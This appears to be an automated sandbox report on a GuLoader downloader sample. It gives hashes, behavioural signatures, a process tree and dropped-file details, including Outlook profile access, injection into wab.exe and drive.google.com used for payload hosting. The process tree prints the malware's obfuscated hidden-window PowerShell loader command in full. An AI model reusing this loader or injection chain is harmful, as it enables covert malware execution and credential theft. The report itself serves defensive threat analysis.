Overview
overview
10Static
static
332b3f3b171...dd.exe
windows7-x64
832b3f3b171...dd.exe
windows10-2004-x64
10$PLUGINSDI...er.dll
windows7-x64
1$PLUGINSDI...er.dll
windows10-2004-x64
1$PLUGINSDI...ge.dll
windows7-x64
1$PLUGINSDI...ge.dll
windows10-2004-x64
1$PLUGINSDI...gs.dll
windows7-x64
3$PLUGINSDI...gs.dll
windows10-2004-x64
3Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
06-07-2024 06:34
Static task
static1
Behavioral task
behavioral1
Sample
32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/Banner.dll
Resource
win7-20240220-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/Banner.dll
Resource
win10v2004-20240704-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/BgImage.dll
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/BgImage.dll
Resource
win10v2004-20240704-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win7-20240704-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win10v2004-20240704-en
General
-
Target
32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe
-
Size
488KB
-
MD5
d513d4e9e8d5d3c5cce1d9b9772d9ff6
-
SHA1
3b6cfeb30beb56c964c32353502ab0d9aaed1903
-
SHA256
32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd
-
SHA512
121090f9b92ec8239216d51dd74c404f2ed8ddb2d696628ec6a021c01b9d63527a8621111aeacfaa38634b9f393335e11b9128f1a4593c5d93cf0271880eef52
-
SSDEEP
12288:iqgowimskzTvnzpiSVF8ZDJ60cOJYULLkV:+im17nzpiSDms0c9sE
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1328 powershell.exe -
Loads dropped DLL 3 IoCs
pid Process 1480 32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe 1480 32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe 1480 32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 17 drive.google.com 18 drive.google.com -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\energetiskes\Physicianer223.lnk 32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 3336 wab.exe 3336 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1328 powershell.exe 3336 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1328 set thread context of 3336 1328 powershell.exe 87 -
Drops file in Program Files directory 3 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\eduard.lyz 32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe File opened for modification C:\Program Files (x86)\Common Files\yeastless.Rus 32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe File opened for modification C:\Program Files (x86)\Common Files\Marrowless\Mutated.ini 32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\schematizers.roa 32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1328 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 3336 wab.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1480 wrote to memory of 1328 1480 32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe 84 PID 1480 wrote to memory of 1328 1480 32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe 84 PID 1480 wrote to memory of 1328 1480 32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe 84 PID 1328 wrote to memory of 3336 1328 powershell.exe 87 PID 1328 wrote to memory of 3336 1328 powershell.exe 87 PID 1328 wrote to memory of 3336 1328 powershell.exe 87 PID 1328 wrote to memory of 3336 1328 powershell.exe 87 PID 1328 wrote to memory of 3336 1328 powershell.exe 87 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe"C:\Users\Admin\AppData\Local\Temp\32b3f3b17100cf0c711e1e2267fc9ec4f71b0214b3013fe4d5fe2617dea779dd.exe"1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$afstikke=Get-Content 'C:\Users\Admin\AppData\Local\Temp\overmandede\Metran\menubilledet\Taternes\Unionisms.met';$Bedugget123=$afstikke.SubString(8490,3);.$Bedugget123($afstikke)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3336
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5843657eaf7240b695624dcf38bb0eb31
SHA1ca99a44e737fdeaab56f864ce1ef15a57d2eec90
SHA256b935d14c32ad8e16055f7f5794ac3411e601c5ac93155afc623f25b08e2ab82e
SHA5127773d9f6bbd17253d1c96ce225b2f9d3673969b38177afef236d1c5d4aabaae2c07793e07c34f0281ec3b859ae955e83bfe43a598ce7cc6c893ec8c9604f5de3
-
Filesize
7KB
MD5a98576f0d6b35b466cb881860977fdbc
SHA128b3dbbd76f15c876b98dce523100aa3256d193a
SHA2566cc4aadae46ee3e7f39b411ba087ec29bc10aa62b6b5b44003c934b3c51cefe2
SHA51229225bfb30e72d7d3d3571e7562b5901dbf2382af1972cc9a2be8e3bef697b9ac9e0aaac3a9bca191da827ad3cfce7f6876e8be9444663e83a7e2e86788a733c
-
Filesize
9KB
MD52c84faebfda2abe3b16fdf374df4272f
SHA1a5b0258a94e0440aefe1ef320e62e7a9a1c8bb40
SHA25672b38e4cca0af336655d55501c4ea05080baaa9921a62a2d717afe90bb801004
SHA512207164cc6914c59d9f4f3b8ae97628c544093ba6ecda9f8da351f453cd97e03be7a640264b8686b2d5e6f3c787f4df1d8a1ebc8e51fd788a97460cd981cc015e
-
Filesize
340KB
MD5aa7d38c6f05a68d3115f7d8f2c85bf68
SHA1261d6216198dd8f4147c4b3b1c64b84fbc3ce342
SHA2562ab7917f784aecbf5ffb820c02c1d05f6fddb3e2eb34b5b5d4cd5092d06715af
SHA5122530eb514a8a5ce85b81e4c4d67b711ec1eae25ed05eb2a05b68bdbcfcedb219bfb4257b2ebd205dacfb1ddb5e500aa77836e29f9876ceb54d4ecf219b6a1549
-
Filesize
70KB
MD57e0cf6392341c7fa64704f1a19fd90fd
SHA1fd81be021e7daf07dfaddb6a022cf293b812c6ae
SHA25619979f32d2d9a10e05fe7a5530ef85a2afbf89da3828700a5842252963efead6
SHA5121624005c377098b754fad30296fff58cc660a84ef34450f08a83f1a87982beaa086747006d547c13a685856904423a779f76efbccbd4091fd01f4c7eb861b31e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2547232018-1419253926-3356748848-1000\0f5007522459c86e95ffcc62f32308f1_56759c57-3178-4ca7-8f55-68280b8af199
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2547232018-1419253926-3356748848-1000\0f5007522459c86e95ffcc62f32308f1_56759c57-3178-4ca7-8f55-68280b8af199
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b